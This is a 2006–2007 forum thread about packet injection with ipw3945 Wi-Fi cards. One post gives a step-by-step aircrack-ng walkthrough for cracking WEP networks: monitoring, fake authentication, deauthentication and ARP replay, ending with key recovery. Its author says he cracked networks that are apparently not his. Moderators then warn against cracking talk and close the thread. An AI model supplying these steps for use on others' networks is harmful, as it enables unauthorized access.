LinuxQuestions.org
Support LQ: Use code LQ3 and save $3 on Domain Registration
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Networking > Linux - Wireless Networking
User Name
Password
Linux - Wireless Networking This forum is for the discussion of wireless networking in Linux.

Notices

Closed Thread
 
Search this Thread
Old 12-20-2006, 08:33 PM   #1
wolf39us
LQ Newbie
 
Registered: Dec 2006
Posts: 4

Rep: Reputation: 0
Injection


ok...I resolved the first issue ....here's a new one

airodump is working PERFECT (im using ipw3945)

airreplay just doesn't inject packets...I get no errors....and I did try to do an ARP attack and it did show ARP requests...so I think it is working to that extent....but as soon as it starts sending....(its sending thousands of packets) yet I am recieving no more IV's

I am using backtrack...

I believe I am using the right commands....I am using the same commands as I was instructed to on the tutorials....(believe me I have googled alot lol)
 
Old 12-21-2006, 01:10 PM   #2
MS3FGX
Guru
 
Registered: Jan 2004
Location: NJ, USA
Distribution: Slackware, Debian
Posts: 5,852

Rep: Reputation: 351Reputation: 351Reputation: 351Reputation: 351
I could be wrong about this, but last time I had heard, the ipw* devices were not yet capable of stable packet injection.

Doing a quick Google, I found some posts as recent as Nov 16th on the Kismet forums that say the ipw3945 is just not capable of packet injection.

Have you seen elsewhere that injection should be working on your device?
 
Old 01-17-2007, 02:05 AM   #3
alkos333
Member
 
Registered: Dec 2006
Posts: 271

Rep: Reputation: 31
Same

I haven't been able to run send packets with my ipw3945 either. I'm using kismet to get info, airodump to capture, aireplay to deauth, and aireplay to replay/resend packets. aireplay would read like 10000 and wouldn't can't even find a sing ARP. Maybe I'm doing something wrong? MS3FGX, what commands are you using?
 
Old 01-27-2007, 11:31 AM   #4
twentythree
LQ Newbie
 
Registered: Jan 2007
Posts: 1

Rep: Reputation: 0
hello,

i have the same problems...seems like there is no
solution to make injection working on IPW3945!!!

or?? if anyone knows, please post!

here my commands, using backtrack beta2
on a HP notebook (centrino, of course)

monitor mode:
airmon-ng start eth1 4

airodump:
airodump-ng --ivs -w dump --channel 4 eth1

injection: (not working )
aireplay-ng -3 -b MACofAP -h MACofHOST -x 512 eth1
aireplay-ng -0 10 -a MACofAP -c MACofHOST eth1


airodump works fine, injection doesn't work.
there is a patch for IPW2200 cards, but i don't
saw something for IPW3945.

greets, 23.

Last edited by twentythree; 01-27-2007 at 11:37 AM.
 
Old 06-19-2007, 01:36 PM   #5
captain_hook
LQ Newbie
 
Registered: Jun 2007
Posts: 2

Rep: Reputation: 0
Alright Folks,
Happy to say that I have been able to perform injection on ipw3945 cards using WifiWay. I tried BackTrack to no avail. It would seem that since they have a special "Load IPW3945" option they would have solved this problem. Turns out its a big fat "No" (I love the software though). So after a lot of digging around, it was apparent that the ipw3945 driver on BackTrack wasn't patched for injection (refer to Aircrack website for notes on how almost every driver needs to be patched for injection--they have no patch for ipw3945 as of now). Backtrack has lots of other drivers that are patched for injection (check this website for listings of card compatibility and patched drivers--http://backtrack.offensive-security.com/index.php?title=HCL:Wireless). Now the only thing on the internet (yes and I can say this with confidence cause I have SCOURED the internet) that claims to have a ready-to-rumble patched ip3945 driver is WifiWay. Good News first...it works ! Bad News..good support is difficult to find since everything is written in poor english (nothing personal guys :-) , i love the distro ). So I am writing this for all the rest of us ignorant non-spanish speaking Americans (aside-- if you need more tech info and come across a site in spanish, try google's page translator, it converts it from spanish to somewhat readable english). The first thing you will notice is that WifiWay is not as fancy as BackTrack in that it doesn't have all the bells and whistles but it gets the job done for ipw3945 cards. Also WifiWay is slightly different in the way it gets the job done. They use two different devices (virtual or otherwise), rtap0 for monitoring and wifi0 for injection. Also for those of you rebels (and I did this too) who don't like to follow directions, if you do a iwconfig or ifconfig on a system that has been cold booted, it might seem like the card is not being recognized as iwconfig shows up with rtap0 and wifi0 and others with no wireless extensions and ifconfig is equally stoic. Also wlanconfig stuff doesn't work and only comes up with operation not supported messages. But its ok, forget all that stuff for now. So follow these directions closely if not exactly and you will soon find yourself in Wifiland. I am assuming you have used a bootable copy of WifiWay.

Cooking Directions

First do this


1. airodump-ng rtap0

This step will help you find all the relevant info by exposing the networks around you. Kismet didn't work for me and I never really found Kismet to be of much use to me (I hear a lot of WHAT!'s..come on guys we are using airodump and the networks that matter are the only ones that it can see, doesn't matter if Kismet reports a thousand other networks. All the info you need for cracking can be obtained from airodump). If you already know the info of your targets (those of you who have unsuccessfully used BackTrack will have this) you can skip the first step

2. ifconfig wifi0 down -- brings the wifi0 device down for resetting

3. Click the Filesystem icon on desktop and get into /sys/class/net/wifi0/device and click on the rate file. Change it from 108 to 2. Remember to save changes (Ctrl+s)

4. Click on the channel file. Change it to whatever channel you want to be on (AP channel-- say from 1 to 11). Save changes.

5. Click on the bssid file. Change it to the bssid of the AP.Save changes.

6. ifconfig wifi0 up --brings wifi0 up again

7. airodump-ng -w file rtap0 -- you can use other filters for --bssid, --ivs etc
starts collecting data in file-0x.cap file where "x" is a number automatically assigned by airodump.

8. aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0
if this doesn't work (check this site for how success looks http://aircrack-ng.org/doku.php?id=f...ee175e572097e3)
you can do this

aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h STATION wifi0.

If you see an associated client and would like to use a deauth attack instead you need to do

aireplay-ng -0 5 -a BSSID -c STATION

instead. Check Aireplay site for details, it has all the kinds of attacks available. Ah..before I forget, if you want to confirm injection capability of your ipw3945 card (technically you don't need to, I am telling you it works :-) ) or make sure the target is not quirky in any sense, you cannot use the -9 or --test attack in the aircrack version used by WifiWay maybe because its an older version of aircrack.Please let me know if you could get it to do the --test attack.


9. aireplay-ng -3 -b BSSID -h STATION wifi0

you should see the data packets (IV's) number rise in airdump. After collection sufficient data packets (IV's) do

10. do

ls

and you should see all the file-0x.cap files

11. aircrack-ptw file-01.cap --- Aircrack will expose the WEP Key.

--> ESSID is the name of the network "John", "Cindy's Network" etc, BSSID is the MAC of the AP, STATION is the MAC of your wireless card.

Thats it. What I realized is that using WifiWay and ipw3945 is the easiest way to do this. My Dell with a Atheros card using madwifi-ng driver gave me much more trouble (btw you need to do wlanconfig to use madwifi-ng cause it creates Virtual AP's that use the same card and you can find stuff about it on the internet).

One problem I have faced (and this has nothing to do with WifiWay) is that for some networks after step 9, the read ARP count keeps rising up but the sent and got ARP packets number doesn't. They're stuck at zero ? I think this has to do with the network signal strength since all the networks I have been able to crack had high signal strength. I don't think its a MAC filter on the AP cause all these networks have open authentication and I can associate with them just fine (step 8). Would appreciate any suggestions.

Sorry about the noob'ishness. I know it would be awesome to actually compile this stuff in Linux and not use WifiWay (this is important not only to achieve independence but also power, since right now I am dependent on the version of Aircrack WifiWay incorporates in its software and of course can't mod it) but I am too busy and too new to Linux to do this. I would absolutely appreciate any suggestions and directions.

p.s. Respect your Freedom
 
Old 06-20-2007, 07:18 AM   #6
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,785
Blog Entries: 1

Rep: Reputation: 414Reputation: 414Reputation: 414Reputation: 414Reputation: 414
Quote:
Originally Posted by captain_hook
think this has to do with the network signal strength since all the networks I have been able to crack had high signal strength.
I would like to remind everyone that discussions about cracking are against LQ rules. Since this thread is dancing close to the line, I've asked the mods to make a call.
 
Old 06-27-2007, 10:38 AM   #7
acid_kewpie
Moderator
 
Registered: Jun 2001
Location: UK
Distribution: Gentoo, RHEL, Fedora, Centos
Posts: 43,398

Rep: Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965Reputation: 1965
yeah, as detailed above, we don't condone or encourage any black hat activity. looking at your post, it seems you're more boasting baout what you did rather than trying to provide help, which is also not somethign LQ really likes... thirdly, this thread is old and dead, please don't drag up old ones. for simplicity i'm closing this thread now, but will leave as is.
 
  


Closed Thread


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Which Firmware Allows Packet Injection on ipw2200? Sir. BOBSONATOR Linux - Wireless Networking 3 05-21-2007 01:15 AM
help with packet-injection for bcm43xx, where to start? android6011 Linux - Networking 5 10-18-2006 11:07 AM
packet injection help? JustinHoMi Linux - Security 1 02-05-2006 08:58 AM
sql injection inaki Linux - Security 8 12-22-2005 10:41 AM
Is SQL Injection traceable and is it a serious offence? novkhan Linux - Security 2 05-21-2004 10:26 PM


All times are GMT -5. The time now is 02:03 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration